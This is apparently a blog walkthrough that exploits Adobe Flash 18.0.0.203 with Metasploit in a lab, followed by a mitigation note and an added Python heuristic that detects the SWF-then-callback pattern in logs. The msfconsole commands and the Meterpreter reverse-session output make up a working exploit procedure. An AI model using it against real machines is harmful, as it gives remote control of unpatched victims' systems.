Metasploit Adobe Flash 18.0.0.203 Exploit – Windows 7 / Windows 8.1
July 01, 2016 —
metalkey
Attacker: Kali Linux
Victim: Windows 7 Enterprise 32-bit (Adobe Flash Player 18.0.0.203, Firefox 39)
Step 1 – Starting the Exploit Server
Run msfconsole, load the adobe_flash_opaque_background_uaf module and set the required options.
root@kali:~$ msfconsole
msf > use exploit/multi/browser/adobe_flash_opaque_background_uaf
msf exploit(adobe_flash_opaque_background_uaf) > set SRVPORT 80
msf exploit(adobe_flash_opaque_background_uaf) > set URIPATH /
msf exploit(adobe_flash_opaque_background_uaf) > exploit
[*] Local IP: http://192.168.1.12:80/
[*] Server started.
Step 2 – Exploiting the Victim Machine
On your Windows test machine (victim), start Firefox and browse to http://192.168.1.12.
This triggers the adobe_flash_opaque_background_uaf exploit and opens a Meterpreter session.
[*] 192.168.1.11 adobe_flash_opaque_background_uaf - Sending SWF...
[*] Sending stage (885806 bytes) to 192.168.1.11
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.11:49297) at 2015-08-01 04:39:34 -0400
msf exploit(adobe_flash_opaque_background_uaf) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: IE8Win7\IEUser
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2013-10-23 12:22:56 -0400 $Recycle.Bin
40777/rwxrwxrwx 0 dir 2009-07-14 00:53:55 -0400 Documents and Settings
40777/rwxrwxrwx 0 dir 2009-07-13 22:37:05 -0400 PerfLogs
40555/r-xr-xr-x 0 dir 2015-08-01 03:32:42 -0400 Program Files
40777/rwxrwxrwx 0 dir 2015-08-01 03:32:42 -0400 ProgramData
40777/rwxrwxrwx 0 dir 2013-10-23 12:22:42 -0400 Recovery
40777/rwxrwxrwx 0 dir 2014-11-26 14:57:05 -0500 System Volume Information
40555/r-xr-xr-x 0 dir 2013-10-23 12:22:47 -0400 Users
40777/rwxrwxrwx 0 dir 2013-10-23 17:52:20 -0400 Wallpaper
40777/rwxrwxrwx 0 dir 2015-08-01 03:20:08 -0400 Windows
100777/rwxrwxrwx 24 fil 2009-06-10 17:42:20 -0400 autoexec.bat
100666/rw-rw-rw- 10 fil 2009-06-10 17:42:20 -0400 config.sys
100666/rw-rw-rw- 1073741824 fil 2015-08-01 04:01:24 -0400 pagefile.sys
Solution
Uninstall Flash Player.
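For detection, the sequence visible in Step 2 (an SWF served to a client, followed seconds later by a new connection from that client back to the same host on another port) can be looked for in proxy and flow logs. The following is an added example, not part of the original post; the event tuple layout, the 30-second window and the sample events are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

SWF_TYPE = "application/x-shockwave-flash"

# Constructed sample data (not real logs). Hosts and port 4444 mirror the
# transcript above; timestamps other than 04:39:34 are made up.
# HTTP responses: (time, client_ip, server_ip, server_port, content_type)
HTTP_EVENTS = [
    ("2015-08-01 04:39:31", "192.168.1.11", "192.168.1.12", 80, "text/html"),
    ("2015-08-01 04:39:32", "192.168.1.11", "192.168.1.12", 80, SWF_TYPE),
    ("2015-08-01 04:41:00", "192.168.1.20", "203.0.113.5", 80, SWF_TYPE),
]
# Flow records: (time, src_ip, dst_ip, dst_port)
FLOW_EVENTS = [
    ("2015-08-01 04:39:34", "192.168.1.11", "192.168.1.12", 4444),
    ("2015-08-01 04:41:02", "192.168.1.20", "203.0.113.5", 80),     # same port as the page: ignored
    ("2015-08-01 05:10:00", "192.168.1.11", "192.168.1.12", 4444),  # outside the window
]


def _ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def swf_then_callback(http_events, flow_events, window_s=30):
    """Flag clients that received an SWF from a host and, within window_s
    seconds, opened a connection to that same host on a different port."""
    window = timedelta(seconds=window_s)
    swf_seen = {}  # (client, server) -> [(time, http_port), ...]
    for t, client, server, port, ctype in http_events:
        # Ignore parameters such as "; charset=..." and letter case.
        if ctype.split(";")[0].strip().lower() == SWF_TYPE:
            swf_seen.setdefault((client, server), []).append((_ts(t), port))
    alerts = []
    for t, src, dst, dport in flow_events:
        flow_time = _ts(t)
        for swf_time, http_port in swf_seen.get((src, dst), []):
            delay = flow_time - swf_time
            if dport != http_port and timedelta(0) <= delay <= window:
                alerts.append({"client": src, "server": dst,
                               "callback_port": dport,
                               "delay_s": int(delay.total_seconds())})
                break  # one alert per flow is enough
    return alerts


if __name__ == "__main__":
    for alert in swf_then_callback(HTTP_EVENTS, FLOW_EVENTS):
        print(alert)
```

This heuristic only covers a callback on a different port, as in the transcript above; treat it as one signal alongside removing Flash Player.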
Tags: metasploit